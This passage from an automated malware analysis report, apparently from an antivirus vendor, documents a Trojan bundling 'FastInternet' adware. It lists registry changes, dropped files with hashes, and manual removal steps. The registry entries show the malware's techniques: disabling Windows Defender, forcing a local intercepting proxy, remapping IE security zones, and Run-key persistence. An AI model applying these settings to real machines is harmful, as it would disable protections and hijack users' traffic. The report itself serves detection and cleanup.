"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"-loopback>

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"

The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 28 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A D1 68 A4 37 35 F9 1E AA 79 96 9C 58 B2 0F BF"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"

"VMware User Process"

"SunJavaUpdateSched"

The process %original file name%.exe:1756 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 03 00 00 00 29 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"

[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E DE 8A 1F 7F B4 35 8D BE 6A 90 41 2B CC 74 11"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"

"dutoauto" = "C:\a\wincheckfe.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"

"interpee" = "C:\a\internetport3.exe"

"autoauto" = "63839615.bat"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "63839615.bat"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
a632e8db250976257ee2e73d658ada12c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
8614c450637267afacad1645e23ba24ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\System.dll
c498ae64b4971132bba676873978de1ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\inetc.dll
99f345cf51b6c3c317d20a81acb11012c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\KillProcDLL.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\System.dll
c498ae64b4971132bba676873978de1ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\System.dll
c498ae64b4971132bba676873978de1ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\nsExec.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\System.dll
c498ae64b4971132bba676873978de1ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\nsExec.dll
8614c450637267afacad1645e23ba24ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\System.dll
c17103ae9072a06da581dec998343fc1c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsyD.tmp\System.dll
a632e8db250976257ee2e73d658ada12c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe
2df723b3cb50a002fca6e8c63a7a487fc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe
cb6a1aa1be943fd5aa85bd18708f759bc:\Program Files\FastInternet\app.exe
29ff2eda9ef60448c67860c675175072c:\Program Files\FastInternet\dotuninstall.exe
42badc1d2f03a8b1e4875740d3d49336c:\a\7za.exe
2df723b3cb50a002fca6e8c63a7a487fc:\a\DYK287G2Jhwy64P0Ln0s.exe
b19e81fc91a71a7222e63ea4f09771afc:\a\FiddlerCore.dll
da9dbf01355305af60037cd13ccf2968c:\a\getcap.exe
2943023b33bb769d64721d4edccbd00bc:\a\internetport3.exe
e703835506e5dab34f20b5b496a38f72c:\a\wcheckf.exe
813d46d64e42bf222676084e12e2e80dc:\a\wincheckfe.exe
7988bca8dfaacb79579fd000a31e69cfc:\a\winonit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WMIC.exe:568
    vchk.exe:1656
    taskkill.exe:216
    taskkill.exe:1140
    taskkill.exe:668
    taskkill.exe:136
    taskkill.exe:492
    taskkill.exe:1832
    taskkill.exe:1836
    taskkill.exe:1772
    taskkill.exe:1548
    taskkill.exe:1372
    taskkill.exe:936
    taskkill.exe:2012
    taskkill.exe:1096
    taskkill.exe:628
    taskkill.exe:1092
    taskkill.exe:1492
    taskkill.exe:1956
    taskkill.exe:1952
    taskkill.exe:828
    taskkill.exe:1668
    taskkill.exe:820
    taskkill.exe:376
    taskkill.exe:596
    taskkill.exe:1124
    taskkill.exe:316
    taskkill.exe:1088
    taskkill.exe:1928
    taskkill.exe:1852
    taskkill.exe:1856
    taskkill.exe:1252
    taskkill.exe:1016
    taskkill.exe:916
    taskkill.exe:1656
    taskkill.exe:308
    taskkill.exe:448
    taskkill.exe:1232
    taskkill.exe:440
    taskkill.exe:1136
    taskkill.exe:1932
    taskkill.exe:908
    taskkill.exe:1240
    taskkill.exe:648
    taskkill.exe:1632
    taskkill.exe:516
    taskkill.exe:1348
    taskkill.exe:1340
    taskkill.exe:336
    taskkill.exe:576
    taskkill.exe:856
    taskkill.exe:1424
    taskkill.exe:1980
    taskkill.exe:1584
    taskkill.exe:652
    taskkill.exe:508
    taskkill.exe:480
    taskkill.exe:568
    taskkill.exe:468
    taskkill.exe:464
    taskkill.exe:564
    taskkill.exe:1804
    taskkill.exe:168
    taskkill.exe:228
    taskkill.exe:1868
    taskkill.exe:224
    taskkill.exe:1916
    taskkill.exe:968
    taskkill.exe:1180
    taskkill.exe:1456
    taskkill.exe:1748
    taskkill.exe:1740
    taskkill.exe:740
    taskkill.exe:1160
    taskkill.exe:884
    taskkill.exe:1204
    taskkill.exe:608
    taskkill.exe:552
    taskkill.exe:1968
    taskkill.exe:872
    taskkill.exe:956
    taskkill.exe:320
    taskkill.exe:1112
    taskkill.exe:324
    taskkill.exe:1752
    taskkill.exe:612
    taskkill.exe:1888
    taskkill.exe:1884
    taskkill.exe:1760
    taskkill.exe:1880
    taskkill.exe:1284
    taskkill.exe:512
    taskkill.exe:1472
    taskkill.exe:808
    taskkill.exe:2008
    taskkill.exe:1368
    %original file name%.exe:1756

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\a\avv.txt (2432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
    C:\a\ahho.txt (4 bytes)
    C:\a\auur.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)
    C:\a\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)
    %Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
    C:\a\ProcessList.txt (1888 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
    C:\a\avchk.txt (2026 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
